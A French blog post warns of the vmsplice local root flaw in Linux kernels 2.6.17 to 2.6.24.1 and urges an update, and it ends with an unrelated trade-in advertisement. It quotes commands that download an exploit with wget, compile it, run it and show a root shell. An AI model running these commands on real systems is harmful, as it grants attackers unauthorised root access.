Prévenu par Koreus et vu plus en détails sur l’excellent site Tux-planet, une horrible faille dans les kernels 2.6.17 à 2.6.24.1.
L’exploit dont parle Tux-Planet permet donc d’obtenir un accès root sur n’importe quelle machine à partir d’un compte user standard…
Ca craint un peu beaucoup. Pensez donc à mettre à jour votre Kernel. (opération délicate quand même !)
Voici un extrait de l’article de Tux Planet que je vous invite à consulter ici.
cd /tmp
wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
./vmsplice-local-root-exploit
…
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=505(sbilbeau)
Merci encore à Koreus et à Pti-Seb
Pack Reprise: Renvoyez votre produit et recevez 80% de son prix d’achat
L’avantage principal est de renouveler son matériel informatique sans soucis de revente
Avec le Pack Reprise, quels sont vos avantages ?
• 1 an pour renvoyer tous les produits éligibles (en état de fonctionnement et non cassés).
• 1 bon d’achat d’un montant égal à 80% du prix TTC du produit au moment de l’achat.
• 1 seconde vie apportée aux produits retournés.
Et ce service VOUS est OFFERT !
Le Pack Reprise s’inscrit dans une démarche écoresponsable. Une fois repris, le produit est remis en état par notre partenaire SPB Services, en respectant les normes Environnementales (DEEE) et de Protection des Données (RGPD).
Il est ensuite redistribué et bénéficie ainsi d’une seconde vie !